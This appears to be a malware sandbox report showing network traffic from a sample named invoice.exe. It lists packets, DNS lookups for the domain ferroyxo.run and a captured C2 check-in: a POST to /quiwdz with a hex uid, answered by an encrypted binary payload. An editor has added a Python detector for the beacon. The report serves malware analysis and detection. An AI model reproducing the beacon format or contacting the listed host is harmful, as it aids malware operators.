                                                                        Apr 2, 2025 11:42:48.034084082 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.034101963 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.236269951 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.236401081 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.237664938 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.237675905 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.237921000 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.239198923 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239327908 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239356995 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.239409924 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.239415884 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787517071 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787636995 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.787934065 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.789530039 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.789547920 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.035032988 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.035089970 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.036088943 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.041476965 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.041512966 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.246228933 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.246361017 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.247682095 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.247699976 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.247958899 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.249392033 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249510050 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249538898 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.249591112 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.249602079 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834147930 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834321976 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:49.834388971 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.834508896 CEST49684443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:49.834527016 CEST44349684172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.018771887 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.018831968 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.018970966 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.019515038 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.019526958 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.222918987 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.223014116 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.224272966 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.224282980 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.224524975 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.225707054 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.225877047 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.225900888 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742768049 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742886066 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:51.742965937 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.743225098 CEST49685443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:51.743247032 CEST44349685172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.206156969 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206211090 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.206284046 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206621885 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.206638098 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.409286976 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.409357071 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.410897970 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.410904884 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.411147118 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.431097031 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432260990 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432286978 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432374954 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432399988 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432487965 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432534933 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432837009 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.432854891 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.432987928 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433002949 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.433088064 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433099031 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.433140039 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433180094 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.433202028 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476279974 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.476459980 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476505995 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.476515055 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520287037 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.520402908 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520494938 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.520535946 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.564290047 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.564522982 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:52.612273932 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:52.631499052 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.922930002 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.923063993 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.923130035 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.923227072 CEST49686443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.923243999 CEST44349686172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.974617004 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.974657059 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:53.974735022 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.975181103 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:53.975203991 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.175365925 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.175756931 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.180274010 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.180291891 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.180600882 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.181925058 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.181925058 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.182033062 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.698894024 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.698961973 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.699088097 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699331045 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699348927 CEST44349687172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:54.699361086 CEST49687443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:54.699368000 CEST44349687172.67.131.170192.168.2.7
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 11:42:45.181822062 CEST | 63511 | 53 | 192.168.2.7 | 1.1.1.1
Apr 2, 2025 11:42:45.298235893 CEST | 53 | 63511 | 1.1.1.1 | 192.168.2.7
Apr 2, 2025 11:43:00.279706001 CEST | 61158 | 53 | 192.168.2.7 | 1.1.1.1
Apr 2, 2025 11:43:00.377604008 CEST | 53 | 61158 | 1.1.1.1 | 192.168.2.7
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 2, 2025 11:42:45.181822062 CEST | 192.168.2.7 | 1.1.1.1 | 0xded0 | Standard query (0) | ferroyxo.run | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:43:00.279706001 CEST | 192.168.2.7 | 1.1.1.1 | 0xaf79 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 2, 2025 11:42:45.298235893 CEST | 1.1.1.1 | 192.168.2.7 | 0xded0 | No error (0) | ferroyxo.run | - | 172.67.131.170 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:42:45.298235893 CEST | 1.1.1.1 | 192.168.2.7 | 0xded0 | No error (0) | ferroyxo.run | - | 104.21.4.48 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:42:59.953512907 CEST | 1.1.1.1 | 192.168.2.7 | 0x8627 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:42:59.953512907 CEST | 1.1.1.1 | 192.168.2.7 | 0x8627 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:43:00.377604008 CEST | 1.1.1.1 | 192.168.2.7 | 0xaf79 | No error (0) | c.pki.goog | pki-goog.l.google.com | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 2, 2025 11:43:00.377604008 CEST | 1.1.1.1 | 192.168.2.7 | 0xaf79 | No error (0) | pki-goog.l.google.com | - | 172.217.165.131 | A (IP address) | IN (0x0001) | false
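The tables above give the two pieces an analyst joins by hand: ferroyxo.run resolves to two Cloudflare addresses, and every TCP session in the packet list goes to one of them (172.67.131.170:443). The HTTPS session listing that follows then shows the first request on that connection, a POST to /quiwdz with the body uid=<hex>&cid= and a hard-coded Chrome/109 User-Agent. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It attributes each TCP session to the name that resolved to its server IP, reassembles the request body from the report's "Data Raw" hex dump and checks it against the declared Content-Length, and scores the request against three traits of this check-in. The DNS rows, session ports, request headers and hex bytes are copied from the report; the benign comparison request (intranet.example.test), the 32 to 64 hex-digit bound on uid, the "<no-dns>" label and the two-trait decision threshold are the editor's assumptions.

```python
"""Join the report's DNS answers to its TCP sessions, rebuild the C2 request
body from the 'Data Raw' hex dump, and flag the LummaC-style check-in.
Added example: data copied from the report, thresholds chosen by the editor."""
import re
from collections import defaultdict

# (name, address) pairs from the report's DNS answer table.
DNS_ANSWERS = [
    ("ferroyxo.run", "172.67.131.170"),
    ("ferroyxo.run", "104.21.4.48"),
    ("bg.microsoft.map.fastly.net", "199.232.210.172"),
    ("pki-goog.l.google.com", "172.217.165.131"),
]

# The seven TCP sessions in the report: 192.168.2.7:49681-49687 -> 172.67.131.170:443.
TCP_SESSIONS = [(port, "172.67.131.170", 443) for port in range(49681, 49688)]

def sessions_by_domain(answers, sessions):
    """Attribute each TCP session to the DNS name(s) that resolved to its server IP.
    A server IP no query resolved is labelled '<no-dns>' (assumed label): a
    hard-coded C2 address is itself worth a look."""
    names_for_ip = defaultdict(set)
    for name, addr in answers:
        names_for_ip[addr].add(name)
    result = defaultdict(list)
    for client_port, server_ip, server_port in sessions:
        for name in names_for_ip.get(server_ip) or {"<no-dns>"}:
            result[name].append((client_port, server_port))
    return dict(result)

# 'Data Raw' hex of the 51-byte request body, copied from the report.
RAW_BODY_HEX = ("75 69 64 3d 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 "
                "35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 "
                "39 39 26 63 69 64 3d")

def decode_raw(hexdump):
    """Turn a space-separated 'Data Raw' hex dump back into bytes."""
    return bytes.fromhex(hexdump.replace(" ", ""))

# Request headers exactly as shown in the report; body rebuilt from the hex dump.
LUMMA_REQUEST = (
    "POST /quiwdz HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\n"
    "Content-Length: 51\r\n"
    "Host: ferroyxo.run\r\n\r\n"
) + decode_raw(RAW_BODY_HEX).decode("ascii")

# Constructed ordinary browser form post (not from the report) as a negative control.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: intranet.example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\r\n"
    "Accept: text/html,application/xhtml+xml,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 27\r\n\r\n"
    "user=alice&password=secret1"
)

# Registration body seen in the report: uid=<hex id>&cid=<campaign id, empty here>.
# The 32-64 hex-digit bound is an assumption; the report's uid has 42 digits.
UID_BODY = re.compile(r"^uid=[0-9a-f]{32,64}&cid=[0-9a-f]*$")
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def content_length_ok(raw):
    """Sanity check on the reassembly: declared Content-Length equals the body size."""
    _, _, headers, body = parse_request(raw)
    return int(headers.get("content-length", -1)) == len(body.encode("ascii"))

def checkin_indicators(raw):
    """Return the check-in traits present in one request (names are the editor's)."""
    method, _path, headers, body = parse_request(raw)
    user_agent = headers.get("user-agent", "")
    hits = []
    if (method == "POST" and UID_BODY.match(body)
            and headers.get("content-type") == "application/x-www-form-urlencoded"):
        hits.append("uid=<hex>&cid= registration body")
    if "Chrome/109.0.0.0" in user_agent:
        hits.append("hard-coded Chrome/109 user agent")
    if "mozilla/" in user_agent.lower() and not any(h in headers for h in BROWSER_HEADERS):
        hits.append("browser user agent without any Accept* header")
    return hits

def is_checkin(raw, threshold=2):
    """Decision rule (editor's choice): two or more traits together."""
    return len(checkin_indicators(raw)) >= threshold
```

Run against the report's request, decode_raw gives back the 51 bytes the Content-Length header promises and all three traits fire; the constructed browser post trips none of them. The third trait is the one that survives a change of path or User-Agent version: a real browser submitting a form sends Accept, Accept-Language and Accept-Encoding, and this sample sends none of them.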
                                                                        • ferroyxo.run
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49681 | 172.67.131.170 | 443 | 6892 | C:\Users\user\Desktop\invoice.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:42:45 UTC | 263 | OUT | POST /quiwdz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 51
    Host: ferroyxo.run
2025-04-02 09:42:45 UTC | 51 | OUT | Data Raw: 75 69 64 3d 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 26 63 69 64 3d
    Data Ascii: uid=e91dba334d13b3862d5fcf1c07f54f82f2e4b89799&cid=
2025-04-02 09:42:46 UTC | 244 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Apr 2025 09:42:45 GMT
    Content-Type: application/octet-stream
    Content-Length: 33661
    Connection: close
    Server: cloudflare
    Cf-Cache-Status: DYNAMIC
    CF-RAY: 929f60c7ade09d36-EWR
    alt-svc: h3=":443"; ma=86400
2025-04-02 09:42:46 UTC | 1125 | IN | Data Raw: 8f 2f b8 b7 7a 84 9e 52 73 f3 12 4e 8e e1 cd ea 51 de 99 26 38 f9 25 9e 56 72 16 ea 80 ea af 71 09 2c bd 42 bb 89 ea ca 64 70 35 ad a2 ae 24 73 47 ab 65 29 f7 0c ac 69 1a b7 f3 ec 80 80 f9 52 bc af 42 d7 ca d2 3f c1 73 fe 37 14 eb 04 41 35 12 96 71 ff e9 f2 bb 7e c1 40 0a 90 79 b7 72 b9 6c cb d6 ad b0 56 de 38 24 41 56 f3 78 d4 d9 e5 82 e8 88 4f 97 43 11 3c a5 b7 54 18 c6 14 82 51 f0 4b 28 8c 08 f0 f8 03 44 8c 3b 60 ad 66 ab f4 aa bb 47 2f 5f 85 ae 0f 1e b3 a6 31 2c 79 08 ee d4 7e ad 0d b3 88 ee d9 2b 0d 63 10 b1 21 ca cd d3 4c 4c 0f 9f 81 da 10 ac 3f 63 c2 5f 76 3f a7 7f b3 8f 89 bd e5 01 08 ec 79 8f 5d cc 47 69 70 e5 2e 88 cb 37 ac af 4d 30 79 f1 50 19 ff 19 4a dc c6 e2 35 4e ca e5 db 4e 4c bd fb 5a ed 7c 33 2b fb 88 8f dc a3 fe 41 c7 7f 70 dd 3e 32 a9
    Data Ascii: /zRsNQ&8%Vrq,Bdp5$sGe)iRB?s7A5q~@yrlV8$AVxOC<TQK(D;`fG/_1,y~+c!LL?c_v?y]Gip.7M0yPJ5NNLZ|3+Ap>2
2025-04-02 09:42:46 UTC | 1369 | IN | Data Raw: 85 93 c0 5a 46 bd 20 ca 91 99 9b ae c9 18 35 64 33 b5 9a b6 d2 19 0b 0e db 6b c5 97 32 19 31 e1 9c 8b ae c3 84 a5 de 8b be 16 d4 4b 23 43 8e 0b 72 be 47 71 26 3d 27 2f ac 22 b3 d4 b1 c7 42 12 c8 ad 0c 23 37 c4 f2 0e b7 5a a0 c9 b8 83 8b 9b b8 a6 43 a3 e1 a8 db aa 8c 19 06 b9 e7 a0 84 70 96 82 fc 7c 3f ac 65 5b aa e6 60 de fd 6f 61 b2 72 6a a9 0e a4 c6 7c 68 c7 2c d3 3b 0a eb 4f f9 a8 22 ec 7b 7b 5b ae 6a 97 85 49 1b 27 dc 01 95 61 2e da 43 bb 2d 10 52 93 5a a8 bd e9 2c 7f 82 ed 60 34 02 b7 65 61 65 25 69 86 79 ae 99 d0 72 75 7a 07 c1 ec c3 6c 32 af d3 23 18 fd 7e 13 d1 d5 75 9c 57 04 77 41 a7 a3 fb c6 38 d3 19 2d dc 0d 76 91 e6 70 ef 28 11 7e e8 d0 96 b0 c2 1a 48 57 04 de 73 37 91 14 8c bc 5f 1d 75 a7 2a 90 9f 82 42 fd ed 38 bb 82 a2 15 71 3f f1 ad 44 b7
    Data Ascii: ZF 5d3k21K#CrGq&='/"B#7ZCp|?e[`oarj|h,;O"{{[jI'a.C-RZ,`4eae%iyruzl2#~uWwA8-vp(~HWs7_u*B8q?D
2025-04-02 09:42:46 UTC | 1369 | IN | Data Raw: 8c 25 c7 31 d7 13 d5 cc 84 ad 0f a4 12 d0 95 21 cd 4d c1 17 a5 ea 2e 18 75 b9 c6 9c ab 0d 89 87 19 b0 67 c8 cd a1 8b 26 24 2e 1f e7 96 91 4b 07 64 11 c8 fc 14 d6 1c cd 36 a0 4f 48 bf 1c e2 68 40 fd 0d ee a1 ae da 8a 97 f0 21 a8 b0 e4 1b 0d ca c7 ce 3b 36 03 01 52 79 08 ea 64 a3 f3 65 f9 03 8c 68 eb 27 aa ed 06 63 06 fa 0a 28 99 0a 00 1d d3 44 9d 6d e7 fe af bd 33 0b a4 e2 62 0c 47 f8 cb c4 b9 03 16 85 58 10 15 9e 15 a1 ed 03 d3 5d d1 a0 91 dc f4 a4 5b 7f 13 9d 3d 9d 49 9e a8 10 33 d7 ac 31 a8 8e 81 2e 0d 52 88 47 f5 83 63 5e bd 6f d2 98 0b 9f 06 9a 12 73 cb 3c 93 61 ba 53 59 29 1a 65 97 9c 4b 41 7f 1b d6 56 00 c1 8a 5c 9c 15 1f 3c da 45 33 cd 64 d0 03 bf c7 c2 f7 fa 1a 78 2b e3 73 57 ae 54 f6 8b 7c 27 cd 45 81 3d ce 91 2a fa f3 e9 67 7e 45 20 0f 23 9c 96
    Data Ascii: %1!M.ug&$.Kd6OHh@!;6Rydeh'c(Dm3bGX][=I31.RGc^os<aSY)eKAV\<E3dx+sWT|'E=*g~E #
2025-04-02 09:42:46 UTC | 1369 | IN | Data Raw: 71 45 f4 eb 9c d8 7f 8b 9b d7 5d dc 05 5f 2d 34 95 8e 5d e9 cd ea e8 51 cc 1b f7 65 a4 08 ff 5a 96 b0 0c 26 a5 24 70 f0 44 28 5d e6 a7 e1 38 57 aa a6 a9 60 c1 0c 96 26 04 bc dd d8 ef 45 8f 07 8a 9d 10 32 43 7a 18 70 35 7c 7f d4 e2 85 a0 25 2e c3 f4 4f cc 93 28 19 75 66 8d f0 ae fa 35 7e 67 d0 c6 b5 a9 3b 53 c1 9a a6 f9 95 ee cd c5 94 ac 50 ad 64 cd a6 8b 4c 30 5b 05 04 8b f7 8b c7 63 b3 5e 70 dc 22 78 97 0d e1 4c da f1 ef 3e 42 2f 72 ee 54 96 5e 23 ac 7e 75 ac 38 57 22 5d 9a 22 cc 7a 1e e2 e1 c5 ce 06 88 b9 16 69 20 12 a4 8c 32 37 4b ae b0 53 b5 53 22 d3 df 8f 2a e8 36 39 d4 46 2c 5d e1 b0 84 17 50 f1 7f 99 2f 33 18 e1 a2 54 22 8c 52 5d 31 e5 9f b1 f1 93 06 a8 8a ad a7 84 c0 54 89 a9 e4 15 97 68 6c e9 17 4c 6e 25 ca 86 10 ef 94 26 f0 ba c2 08 31 ec c2 17
                                                                        Data Ascii: qE]_-4]QeZ&$pD(]8W`&E2Czp5|%.O(uf5~g;SPdL0[c^p"xL>B/rT^#~u8W"]"zi 27KSS"*69F,]P/3T"R]1ThlLn%&1
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: e7 3d 95 ef 8a dd 87 62 38 3b db 0c 7a 79 40 15 3b f0 98 11 3a 16 16 ca e6 30 ed c7 bf 85 84 cd a0 ab 67 d8 c7 25 89 60 aa 68 09 4a be 55 13 cd 99 a0 43 e6 c6 4d 6a 08 7a 78 b5 1a 6b 34 68 e0 57 98 00 e3 a5 41 b5 10 93 5c a3 d8 6f 95 d0 7f a5 24 89 6e 16 6b b5 5f 9b c8 f7 86 4f f4 f5 87 80 00 76 f0 90 24 2e f5 c0 cd b7 65 9f e4 18 c0 9b 5f d6 64 72 ad 34 59 36 fa 69 99 ab b3 13 73 5d 95 bf 19 c4 9e c6 38 2c 31 c4 ee 6c 1a c4 f8 0b 62 81 20 f5 a5 dd 9e 63 49 e7 b2 9e 67 77 66 1c f1 fc ab 20 3c 43 7e a1 7c 2e 1f b4 d1 ff 26 92 c9 99 aa ea d4 64 09 9d 76 c5 61 50 c5 58 24 ec 5b cc 1e 52 d2 7f cb f8 4e 52 ae f9 3e 97 0a 5c 2e 6c b7 1f db 9e 0b 65 e2 f6 34 20 43 46 c4 b1 e6 35 70 62 d7 3e 17 b2 21 2e b7 b3 11 ed 51 05 81 c4 23 eb 39 67 37 01 aa 5f 6f 4b 5c db
                                                                        Data Ascii: =b8;zy@;:0g%`hJUCMjzxk4hWA\o$nk_Ov$.e_dr4Y6is]8,1lb cIgwf <C~|.&dvaPX$[RNR>\.le4 CF5pb>!.Q#9g7_oK\
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: 71 5f 3d 38 55 82 77 08 1f 2d 1a de ad 24 c0 4f 70 da c3 af e3 3e a4 b0 42 29 0b e8 13 0b 30 e9 d1 54 f2 75 d7 9b 36 c7 2b 1d b2 6f 2a 12 e9 e8 8c 3d 00 64 74 d4 e6 25 d0 c1 9b cf 86 41 61 4d b5 bf 34 23 70 54 a8 e2 ca e4 35 3f fb d4 fd 52 21 c2 a1 ad 32 ef ba 27 c4 2e 21 6a 52 dd 91 03 eb d3 af 83 5c 58 df 13 1a 12 82 3f 2b be 1a 93 f7 f6 7b 4d cc 6d 2f 33 d7 ac 59 83 9e cc f4 cb 8f fe bf 56 53 1b 3b 31 c1 a4 e1 85 be 22 e3 9a 3c 39 5a 65 7e 86 b9 b7 a4 be dc 88 27 09 ad 1b 4b dc 25 81 0a 65 f3 36 fd ba 46 76 d2 59 41 17 e4 1d ef c0 00 52 5a 0c a3 a6 e0 51 cc 83 82 bf ec 18 da bb b0 4e f3 7f 55 67 65 f8 43 43 c4 f0 8c 95 56 3a e0 48 eb ee ca 96 04 e2 22 60 5e e0 84 b4 c9 22 30 45 7c 1b 52 b7 f7 e5 b7 6b c7 e5 59 56 36 8e 30 7f f9 eb 26 3d be f1 04 fe c6
                                                                        Data Ascii: q_=8Uw-$Op>B)0Tu6+o*=dt%AaM4#pT5?R!2'.!jR\X?+{Mm/3YVS;1"<9Ze~'K%e6FvYARZQNUgeCCV:H"`^"0E|RkYV60&=
                                                                        2025-04-02 09:42:46 UTC1369INData Raw: e6 30 ec ac 31 e5 d9 57 a7 2f e8 fd 55 81 55 28 e7 2c 8a 62 fe f1 e0 a1 41 e7 73 ca af 60 03 e5 39 5d c5 3b 57 92 be 97 f6 9a fc bc c8 9e bd 52 79 0a fb 45 84 4b 2c d1 5a 86 ee b8 d7 ab e7 f2 09 76 29 2d 68 d4 3d 99 5b 9c 9c ac 96 d7 bd f7 0b b4 23 55 0b d4 1c b4 de 81 be cb ae 25 4f 6b 62 b5 f6 45 d7 bf ff c2 05 d8 15 b9 7d 28 2b 37 89 e1 2d 80 1e 06 7b db 47 b5 b6 00 62 a9 90 48 b2 5f 9a 6e 28 16 7e b3 ff ed 45 aa 26 3f 34 c3 1d 96 72 8d 94 ea e4 b5 e9 b7 be 27 0d 3a 33 5d 2d 5f 10 db d2 35 02 e0 49 fe 10 97 c3 5b b6 f3 b0 a3 bd 56 b5 63 36 3b ab ea ae 94 e9 07 ce 85 e9 e3 a0 ef 37 60 a1 ba c0 a0 15 79 3f 2a 9b 61 36 f7 79 15 7c c2 d9 5e 43 54 eb 1c 89 95 9e 2c 95 b7 ab 63 55 1e 94 e6 11 4a fc 0f 45 e0 2f 1b a2 eb 36 e1 76 ba 99 d1 42 10 db 0f 2c 8b 1a
